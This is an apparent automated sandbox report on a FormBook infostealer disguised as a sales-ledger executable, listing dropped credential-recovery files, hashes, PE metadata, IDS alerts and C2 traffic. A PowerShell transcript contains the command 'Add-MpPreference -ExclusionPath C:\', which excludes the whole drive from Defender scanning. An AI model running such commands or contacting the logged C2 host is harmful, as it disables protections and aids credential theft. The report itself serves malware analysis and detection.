SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai155hga.ohd.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\28L0N9-0\28Llogim.jpeg Download File
Process:	C:\Windows\SysWOW64\cmmon32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	95677
Entropy (8bit):	7.919177855177055
Encrypted:	false
SSDEEP:	1536:CGA3mwPhxXv4zyIgZKsHdnPdT6KmS3TffgjQ0NzCZcjzgbvdHvPv30U+rMbs0kzM:hUmqXvHrDHdPdTT3sZEZUWv5PvorMbss
MD5:	C0122538B0EEFF8698CF7E0F890D24D2
SHA1:	2823E6C629CB43FD4AC2D1AD2DE750FC3457AB0F
SHA-256:	23955408BAB3083853CBF6C47A1FD8BBAD97CBD5A8A8C40556160A7A389AFF69
SHA-512:	05D72B0D02CB551251854067399F23532D901374383BEA7D6A1FC25909FE0CDA7B3C4EA50331162647835A5A3C7F3CEFC27E77489494B057E3EB7CEF3C9AC507
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(....Q..R...`2.`....j.$.....+..];$....F...K.1...3.)k...@<1..@.../...G. .....g.G.....~.W.W.......

C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrg.ini Download File
Process:	C:\Windows\SysWOW64\cmmon32.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini Download File
Process:	C:\Windows\SysWOW64\cmmon32.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrv.ini Download File
Process:	C:\Windows\SysWOW64\cmmon32.exe
File Type:	data
Category:	dropped
Size (bytes):	210
Entropy (8bit):	3.518213280978656
Encrypted:	false
SSDEEP:	6:tGQPYlIaExGNlGcQga3Of9y96GO4elMrsEoY:MlIaExGNYvOI6x4FrYY
MD5:	8E072F1CA3E4F3D5FC69A2B9663D2544
SHA1:	BBA45FE6AC81F235ED17E164CFE32E2C92931AF2
SHA-256:	8CE7C9F67BA5EC254BBFCF5F45E8EE2822BAF2B36313C69B51E887AD93B6044A
SHA-512:	BCF6F6A9942A1A6F01A5A7ED099EDDE188754BAD6A575962B1A250FF43480EE08CC14A94F76B1A8E594B40A60C0E23758F0F8B9B69A19842D158009ABE7170D5
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.l.r.x.b.p.m.p.x.h.f.b.m.a.q.....A.u.t.:.......P.a.s.s.:.......

C:\Users\user\Documents\20210412\PowerShell_transcript.928100.qQXLRrJV.20210412144010.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5048
Entropy (8bit):	5.380112009222799
Encrypted:	false
SSDEEP:	96:BZHhGN5iqDo1ZyZ7hGN5iqDo1ZAM6UjZxhGN5iqDo1ZdFEEcZc:wWVE
MD5:	C71DC0FC03110798155EB83AEC4309DF
SHA1:	41EF12380C0EA508955E548565BB6B8B82D1A18E
SHA-256:	CB36DDA171E05116B9C89061B88E7217A4D06F83DC3BABA7281009ED4A694478
SHA-512:	C2D58E3AD65405D9B524D4C591826C850E14687C3376912CEA2CAA82E3D55646E6E945E2055CAB8B5F28202E005BD28C03E6C733B99E5FBB1F2BD0023E033CA1
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210412144028..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 2420..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210412144028..******************..PS>Add-MpPreference -ExclusionPath C:\..********************..Windows PowerShell transcript start..Start time: 20210412144312..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.158845349064943
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Require your Sales Ledger from 01-April-2020.exe
File size:	736256
MD5:	c7c27e1859f1593aedb1eebf0a15175e
SHA1:	deb5544c037a7757462afab46ae2ca14a8f7f945
SHA256:	d7e71646c9427067e810e1b278beb6ad1f07e6b0c5003d9be2611178e4f5470c
SHA512:	7f8e332b6163ec2b052ead9c9958c88dead193beb5c6d93851190c9dfc27a6a78fd7ff461fb363da6809f1134460f255dca918ba3a23019a64870beedbce2033
SSDEEP:	12288:JLwe/ZRRUxLGX9eW++HhtUnNJ2WD9cgMuwS2T8Xo2i10OlYKit:q0HRYLov+Yh+NzxFWgXh5K
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!t`............................B.... ........@.. ....................................@................................

File Icon


Icon Hash:	0a9aa29aa2a28200

Static PE Info

General
Entrypoint:	0x47d242
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607421F5 [Mon Apr 12 10:33:25 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7d1e8	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7e000	0x383d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7b248	0x7b400	False	0.976667485421	data	7.9825675946	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x7e000	0x383d8	0x38400	False	0.171124131944	data	3.98776782923	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x7e550	0x330	data
RT_ICON	0x7e880	0x130	data
RT_ICON	0x7e9b0	0xb0	GLS_BINARY_LSB_FIRST
RT_ICON	0x7ea60	0x298f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x813f0	0x668	data
RT_ICON	0x81a58	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1, next used block 131072
RT_ICON	0x81d40	0x1e8	data
RT_ICON	0x81f28	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x82050	0x24aa	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x844fc	0xea8	data
RT_ICON	0x853a4	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
RT_ICON	0x85c4c	0x6c8	data
RT_ICON	0x86314	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x8687c	0x154e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x87dcc	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x985f4	0x94a8	data
RT_ICON	0xa1a9c	0x67e8	data
RT_ICON	0xa8284	0x5488	data
RT_ICON	0xad70c	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
RT_ICON	0xb1934	0x25a8	data
RT_ICON	0xb3edc	0x10a8	data
RT_ICON	0xb4f84	0x988	data
RT_ICON	0xb590c	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xb5d74	0x148	data
RT_VERSION	0xb5ebc	0x368	data
RT_MANIFEST	0xb6224	0x1b4	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2020
Assembly Version	1.0.0.0
InternalName	Bogxyjdq.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments	Excel Macro Exploit
ProductName	Excel Macro Exploit
ProductVersion	1.0.0.0
FileDescription	Excel Macro Exploit
OriginalFilename	Bogxyjdq.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/12/21-14:41:17.437400	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	185.53.179.90
04/12/21-14:41:17.437400	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	185.53.179.90
04/12/21-14:41:17.437400	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49737	80	192.168.2.3	185.53.179.90
04/12/21-14:41:17.477701	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49737	185.53.179.90	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 14:41:17.356563091 CEST	49737	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:17.396826982 CEST	80	49737	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:17.396898031 CEST	49737	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:17.437271118 CEST	80	49737	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:17.437400103 CEST	49737	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:17.477632046 CEST	80	49737	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:17.477700949 CEST	80	49737	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:17.477734089 CEST	80	49737	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:17.477854013 CEST	49737	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:17.477969885 CEST	49737	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:17.518225908 CEST	80	49737	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.523098946 CEST	49738	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.563442945 CEST	80	49738	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.563633919 CEST	49738	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.565989017 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.604024887 CEST	80	49738	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.604176998 CEST	49738	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.606239080 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.606383085 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.644674063 CEST	80	49738	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.644695044 CEST	80	49738	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.644995928 CEST	49738	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.649164915 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.649346113 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.690356016 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.690514088 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.690524101 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.690650940 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.731153011 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.731177092 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.731285095 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.731406927 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.731496096 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.731645107 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.731820107 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.731823921 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.731931925 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.772171974 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.772270918 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.772305965 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.772356033 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.772377968 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.772433996 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.772461891 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.772605896 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.772628069 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.772783995 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.772921085 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.773015976 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.812920094 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.813088894 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.813091993 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.813298941 CEST	49739	80	192.168.2.3	185.53.179.90
Apr 12, 2021 14:41:19.813304901 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.813344955 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.813507080 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.814652920 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.814677000 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.814692974 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.853662968 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.853730917 CEST	80	49739	185.53.179.90	192.168.2.3
Apr 12, 2021 14:41:19.854041100 CEST	80	49739	185.53.179.90	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 14:39:11.522140026 CEST	58643	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:11.573681116 CEST	53	58643	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:13.118973970 CEST	60985	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:13.170587063 CEST	53	60985	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:14.662055016 CEST	50200	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:14.720777035 CEST	53	50200	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:15.330696106 CEST	51281	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:15.379388094 CEST	53	51281	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:16.691813946 CEST	49199	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:16.742525101 CEST	53	49199	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:47.170037985 CEST	50620	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:47.228601933 CEST	53	50620	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:49.740212917 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:49.791822910 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:51.337075949 CEST	60152	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:51.394336939 CEST	53	60152	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:54.179939032 CEST	57544	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:54.228910923 CEST	53	57544	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:55.207870007 CEST	55984	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:55.259268045 CEST	53	55984	8.8.8.8	192.168.2.3
Apr 12, 2021 14:39:56.126090050 CEST	64185	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:39:56.177630901 CEST	53	64185	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:07.096040964 CEST	65110	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:07.170718908 CEST	53	65110	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:10.835999966 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:10.887254000 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:12.124650002 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:12.175537109 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:12.346266031 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:12.406452894 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:14.961433887 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:15.014569044 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:15.905304909 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:15.959038019 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:33.450150967 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:33.514448881 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:33.574999094 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:33.581015110 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:34.473074913 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:34.532983065 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:35.240588903 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:35.305545092 CEST	53	51352	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:35.555968046 CEST	59349	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:35.618067980 CEST	53	59349	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:36.168555021 CEST	57084	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:36.219218016 CEST	53	57084	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:37.092263937 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:37.213584900 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:38.112802029 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:38.172787905 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:39.078496933 CEST	50540	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:39.138374090 CEST	53	50540	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:41.611711979 CEST	54366	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:41.668776989 CEST	53	54366	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:44.383086920 CEST	53034	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:44.434708118 CEST	53	53034	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:45.186574936 CEST	57762	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:45.246881008 CEST	53	57762	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:47.395488024 CEST	55435	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:47.445667028 CEST	53	55435	8.8.8.8	192.168.2.3
Apr 12, 2021 14:40:55.438410044 CEST	50713	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:40:55.495491982 CEST	53	50713	8.8.8.8	192.168.2.3
Apr 12, 2021 14:41:04.724510908 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:41:04.784730911 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 12, 2021 14:41:06.170977116 CEST	58987	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:41:06.236438990 CEST	53	58987	8.8.8.8	192.168.2.3
Apr 12, 2021 14:41:17.185008049 CEST	56579	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:41:17.344877958 CEST	53	56579	8.8.8.8	192.168.2.3
Apr 12, 2021 14:41:24.052692890 CEST	60633	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:41:24.109646082 CEST	53	60633	8.8.8.8	192.168.2.3
Apr 12, 2021 14:41:25.483484983 CEST	61292	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:41:25.536377907 CEST	53	61292	8.8.8.8	192.168.2.3
Apr 12, 2021 14:41:26.287527084 CEST	63619	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:41:26.336119890 CEST	53	63619	8.8.8.8	192.168.2.3
Apr 12, 2021 14:41:27.190027952 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:41:27.241585970 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 12, 2021 14:41:28.046186924 CEST	61946	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:41:28.095036983 CEST	53	61946	8.8.8.8	192.168.2.3
Apr 12, 2021 14:41:37.750791073 CEST	64910	53	192.168.2.3	8.8.8.8
Apr 12, 2021 14:41:37.835771084 CEST	53	64910	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 14:41:17.185008049 CEST	192.168.2.3	8.8.8.8	0xf110	Standard query (0)	www.seniorlivingcaelderly.com	A (IP address)	IN (0x0001)
